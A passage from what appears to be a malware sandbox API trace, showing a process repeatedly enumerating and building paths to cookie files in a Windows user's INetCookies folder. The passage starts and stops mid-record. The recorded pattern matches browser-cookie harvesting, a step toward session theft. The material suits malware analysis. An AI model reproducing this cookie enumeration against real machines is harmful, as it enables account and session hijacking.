returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\5AV8L20N.txt" [0251.418] FindNextFileW (in: hFindFile=0x44067a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.418] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.418] lstrlenW (lpString="5NWXN3UI.txt") returned 12 [0251.418] lstrlenW (lpString="*.txt") returned 5 [0251.418] wcscpy (in: _Dest=0x79c9f18, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" [0251.418] StrRChrW (lpStart="*.txt", lpEnd=0x0, wMatch=0xfffffffffff1005c) returned 0x0 [0251.418] PathCombineW (in: pszDest=0x79c9f18, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low", pszFile="5NWXN3UI.txt" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\5NWXN3UI.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\5NWXN3UI.txt" [0251.418] FindNextFileW (in: hFindFile=0x44067a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.418] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.418] lstrlenW (lpString="5STJ6NZL.txt") returned 12 [0251.418] lstrlenW (lpString="*.txt") returned 5 [0251.418] wcscpy (in: _Dest=0x79c9368, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" [0251.418] StrRChrW (lpStart="*.txt", lpEnd=0x0, wMatch=0xfffffffffff1005c) returned 0x0 [0251.418] PathCombineW (in: pszDest=0x79c9368, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low", pszFile="5STJ6NZL.txt" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\5STJ6NZL.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\5STJ6NZL.txt" [0251.418] FindNextFileW (in: hFindFile=0x44067a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.418] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.418] lstrlenW (lpString="5TAY54V0.txt") returned 12 [0251.418] lstrlenW (lpString="*.txt") returned 5 [0251.418] wcscpy (in: _Dest=0x79c9478, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" [0251.418] StrRChrW (lpStart="*.txt", lpEnd=0x0, wMatch=0xfffffffffff1005c) returned 0x0 [0251.418] PathCombineW (in: pszDest=0x79c9478, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low", pszFile="5TAY54V0.txt" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\5TAY54V0.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\5TAY54V0.txt" [0251.418] FindNextFileW (in: hFindFile=0x44067a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.418] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.419] lstrlenW (lpString="5WQEGNKI.txt") returned 12 [0251.419] lstrlenW (lpString="*.txt") returned 5 [0251.419] wcscpy (in: _Dest=0x79cb698, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" [0251.419] StrRChrW (lpStart="*.txt", lpEnd=0x0, wMatch=0xfffffffffff1005c) returned 0x0 [0251.419] PathCombineW (in: pszDest=0x79cb698, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low", pszFile="5WQEGNKI.txt" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\5WQEGNKI.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\5WQEGNKI.txt" [0251.419] FindNextFileW (in: hFindFile=0x44067a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.419] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.419] lstrlenW (lpString="66I0OJL8.txt") returned 12 [0251.419] lstrlenW (lpString="*.txt") returned 5 [0251.419] wcscpy (in: _Dest=0x79cb258, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" [0251.419] StrRChrW (lpStart="*.txt", lpEnd=0x0, wMatch=0xfffffffffff1005c) returned 0x0 [0251.419] PathCombineW (in: pszDest=0x79cb258, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low", pszFile="66I0OJL8.txt" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\66I0OJL8.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\66I0OJL8.txt" [0251.419] FindNextFileW (in: hFindFile=0x44067a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.419] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.419] lstrlenW (lpString="80J4IH0Y.txt") returned 12 [0251.419] lstrlenW (lpString="*.txt") returned 5 [0251.419] wcscpy (in: _Dest=0x79cb368, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" [0251.419] StrRChrW (lpStart="*.txt", lpEnd=0x0, wMatch=0xfffffffffff1005c) returned 0x0 [0251.419] PathCombineW (in: pszDest=0x79cb368, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low", pszFile="80J4IH0Y.txt" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\80J4IH0Y.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\80J4IH0Y.txt" [0251.419] FindNextFileW (in: hFindFile=0x44067a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.419] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.419] lstrlenW (lpString="8FFCGS26.txt") returned 12 [0251.419] lstrlenW (lpString="*.txt") returned 5 [0251.419] wcscpy (in: _Dest=0x79caf28, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" [0251.419] StrRChrW (lpStart="*.txt", lpEnd=0x0, wMatch=0xfffffffffff1005c) returned 0x0 [0251.420] PathCombineW (in: pszDest=0x79caf28, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low", pszFile="8FFCGS26.txt" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\8FFCGS26.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\8FFCGS26.txt" [0251.420] FindNextFileW (in: hFindFile=0x44067a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.420] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.420] lstrlenW (lpString="9ABR37NL.txt") returned 12 [0251.420] lstrlenW (lpString="*.txt") returned 5 [0251.420] wcscpy (in: _Dest=0x79ca8c8, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" [0251.420] StrRChrW (lpStart="*.txt", lpEnd=0x0, wMatch=0xfffffffffff1005c) returned 0x0 [0251.420] PathCombineW (in: pszDest=0x79ca8c8, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low", pszFile="9ABR37NL.txt" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\9ABR37NL.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\9ABR37NL.txt" [0251.420] FindNextFileW (in: hFindFile=0x44067a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.420] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.420] lstrlenW (lpString="9IJPMFHZ.txt") returned 12 [0251.420] lstrlenW (lpString="*.txt") returned 5 [0251.420] wcscpy (in: _Dest=0x79ca7b8, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" [0251.420] StrRChrW (lpStart="*.txt", lpEnd=0x0, wMatch=0xfffffffffff1005c) returned 0x0 [0251.420] PathCombineW (in: pszDest=0x79ca7b8, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low", pszFile="9IJPMFHZ.txt" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\9IJPMFHZ.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\9IJPMFHZ.txt" [0251.420] FindNextFileW (in: hFindFile=0x44067a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.420] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.420] lstrlenW (lpString="9M7ZHW1Q.txt") returned 12 [0251.420] lstrlenW (lpString="*.txt") returned 5 [0251.420] wcscpy (in: _Dest=0x79cbe08, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" [0251.420] StrRChrW (lpStart="*.txt", lpEnd=0x0, wMatch=0xfffffffffff1005c) returned 0x0 [0251.420] PathCombineW (in: pszDest=0x79cbe08, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low", pszFile="9M7ZHW1Q.txt" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\9M7ZHW1Q.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\9M7ZHW1Q.txt" [0251.420] FindNextFileW (in: hFindFile=0x44067a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.420] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.420] lstrlenW (lpString="9XACNSYG.txt") returned 12 [0251.420] lstrlenW (lpString="*.txt") returned 5 [0251.420] wcscpy (in: _Dest=0x79cb478, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" [0251.421] StrRChrW (lpStart="*.txt", lpEnd=0x0, wMatch=0xfffffffffff1005c) returned 0x0 [0251.421] PathCombineW (in: pszDest=0x79cb478, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low", pszFile="9XACNSYG.txt" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\9XACNSYG.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\9XACNSYG.txt" [0251.421] FindNextFileW (in: hFindFile=0x44067a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.421] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.421] lstrlenW (lpString="9Z1Y5ICI.txt") returned 12 [0251.421] lstrlenW (lpString="*.txt") returned 5 [0251.421] wcscpy (in: _Dest=0x79ca488, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" [0251.421] StrRChrW (lpStart="*.txt", lpEnd=0x0, wMatch=0xfffffffffff1005c) returned 0x0 [0251.421] PathCombineW (in: pszDest=0x79ca488, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low", pszFile="9Z1Y5ICI.txt" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\9Z1Y5ICI.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\9Z1Y5ICI.txt" [0251.421] FindNextFileW (in: hFindFile=0x44067a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.421] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.421] lstrlenW (lpString="A0RK8A2H.txt") returned 12 [0251.421] lstrlenW (lpString="*.txt") returned 5 [0251.421] wcscpy (in: _Dest=0x79ca378, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" [0251.421] StrRChrW (lpStart="*.txt", lpEnd=0x0, wMatch=0xfffffffffff1005c) returned 0x0 [0251.421] PathCombineW (in: pszDest=0x79ca378, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low", pszFile="A0RK8A2H.txt" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\A0RK8A2H.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\A0RK8A2H.txt" [0251.421] FindNextFileW (in: hFindFile=0x44067a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.421] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.421] lstrlenW (lpString="AA2IJ7JU.txt") returned 12 [0251.421] lstrlenW (lpString="*.txt") returned 5 [0251.421] wcscpy (in: _Dest=0x79caae8, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" [0251.421] StrRChrW (lpStart="*.txt", lpEnd=0x0, wMatch=0xfffffffffff1005c) returned 0x0 [0251.421] PathCombineW (in: pszDest=0x79caae8, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low", pszFile="AA2IJ7JU.txt" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\AA2IJ7JU.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\AA2IJ7JU.txt" [0251.421] FindNextFileW (in: hFindFile=0x44067a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.422] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.422] lstrlenW (lpString="B427TFXJ.txt") returned 12 [0251.422] lstrlenW (lpString="*.txt") returned 5 [0251.422] wcscpy (in: _Dest=0x79cb038, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" [0251.422] StrRChrW (lpStart="*.txt", lpEnd=0x0, wMatch=0xfffffffffff1005c) returned 0x0 [0251.422] PathCombineW (in: pszDest=0x79cb038, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low", pszFile="B427TFXJ.txt" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\B427TFXJ.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\B427TFXJ.txt" [0251.422] FindNextFileW (in: hFindFile=0x44067a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.422] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.422] lstrlenW (lpString="BK4HNAZ1.txt") returned 12 [0251.422] lstrlenW (lpString="*.txt") returned 5 [0251.422] wcscpy (in: _Dest=0x79cb7a8, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" [0251.422] StrRChrW (lpStart="*.txt", lpEnd=0x0, wMatch=0xfffffffffff1005c) returned 0x0 [0251.422] PathCombineW (in: pszDest=0x79cb7a8, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low", pszFile="BK4HNAZ1.txt" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\BK4HNAZ1.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\BK4HNAZ1.txt" [0251.422] FindNextFileW (in: hFindFile=0x44067a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.422] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.423] lstrlenW (lpString="CC7DS78R.txt") returned 12 [0251.423] lstrlenW (lpString="*.txt") returned 5 [0251.423] wcscpy (in: _Dest=0x79ca9d8, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" [0251.423] StrRChrW (lpStart="*.txt", lpEnd=0x0, wMatch=0xfffffffffff1005c) returned 0x0 [0251.423] PathCombineW (in: pszDest=0x79ca9d8, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low", pszFile="CC7DS78R.txt" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\CC7DS78R.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\CC7DS78R.txt" [0251.423] FindNextFileW (in: hFindFile=0x44067a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.423] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.423] lstrlenW (lpString="CDGOWO27.txt") returned 12 [0251.423] lstrlenW (lpString="*.txt") returned 5 [0251.423] wcscpy (in: _Dest=0x79cb588, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" [0251.423] StrRChrW (lpStart="*.txt", lpEnd=0x0, wMatch=0xfffffffffff1005c) returned 0x0 [0251.423] PathCombineW (in: pszDest=0x79cb588, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low", pszFile="CDGOWO27.txt" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\CDGOWO27.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\CDGOWO27.txt" [0251.423] FindNextFileW (in: hFindFile=0x44067a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.423] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.423] lstrlenW (lpString="CYHYO8JD.txt") returned 12 [0251.423] lstrlenW (lpString="*.txt") returned 5 [0251.423] wcscpy (in: _Dest=0x79cb9c8, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" [0251.423] StrRChrW (lpStart="*.txt", lpEnd=0x0, wMatch=0xfffffffffff1005c) returned 0x0 [0251.423] PathCombineW (in: pszDest=0x79cb9c8, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low", pszFile="CYHYO8JD.txt" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\CYHYO8JD.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\CYHYO8JD.txt" [0251.423] FindNextFileW (in: hFindFile=0x44067a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.423] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.423] lstrlenW (lpString="D9QO3KHK.txt") returned 12 [0251.423] lstrlenW (lpString="*.txt") returned 5 [0251.423] wcscpy (in: _Dest=0x79cb148, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" [0251.423] StrRChrW (lpStart="*.txt", lpEnd=0x0, wMatch=0xfffffffffff1005c) returned 0x0 [0251.423] PathCombineW (in: pszDest=0x79cb148, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low", pszFile="D9QO3KHK.txt" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\D9QO3KHK.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\D9QO3KHK.txt" [0251.423] FindNextFileW (in: hFindFile=0x44067a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.423] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.423] lstrlenW (lpString="DN8YUCVA.txt") returned 12 [0251.424] lstrlenW (lpString="*.txt") returned 5 [0251.424] wcscpy (in: _Dest=0x79cad08, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" [0251.424] StrRChrW (lpStart="*.txt", lpEnd=0x0, wMatch=0xfffffffffff1005c) returned 0x0 [0251.424] PathCombineW (in: pszDest=0x79cad08, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low", pszFile="DN8YUCVA.txt" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\DN8YUCVA.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\DN8YUCVA.txt" [0251.424] FindNextFileW (in: hFindFile=0x44067a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.424] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.424] lstrlenW (lpString="DQI7WAG8.txt") returned 12 [0251.424] lstrlenW (lpString="*.txt") returned 5 [0251.424] wcscpy (in: _Dest=0x79ca268, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" [0251.424] StrRChrW (lpStart="*.txt", lpEnd=0x0, wMatch=0xfffffffffff1005c) returned 0x0 [0251.424] PathCombineW (in: pszDest=0x79ca268, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low", pszFile="DQI7WAG8.txt" | out: 